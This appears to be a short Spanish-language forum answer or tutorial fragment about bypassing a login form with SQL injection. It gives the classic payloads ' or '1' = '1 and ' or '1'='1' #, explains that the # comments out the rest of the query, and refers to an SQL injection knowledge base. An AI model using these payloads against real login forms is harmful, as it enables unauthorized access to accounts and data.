Su cadena de inyección debe ser así:
Nombre de usuario y contraseña:
' or '1' = '1
Nombre de usuario (frecuentemente) o contraseña:(Depende de cuál viene primero en la consulta)#
comenta el resto de la consulta.
' or '1'='1' #
Para obtener más información sobre la inyección SQL, puede consultar esta URL perfecta:
The SQL Base de conocimientos de inyección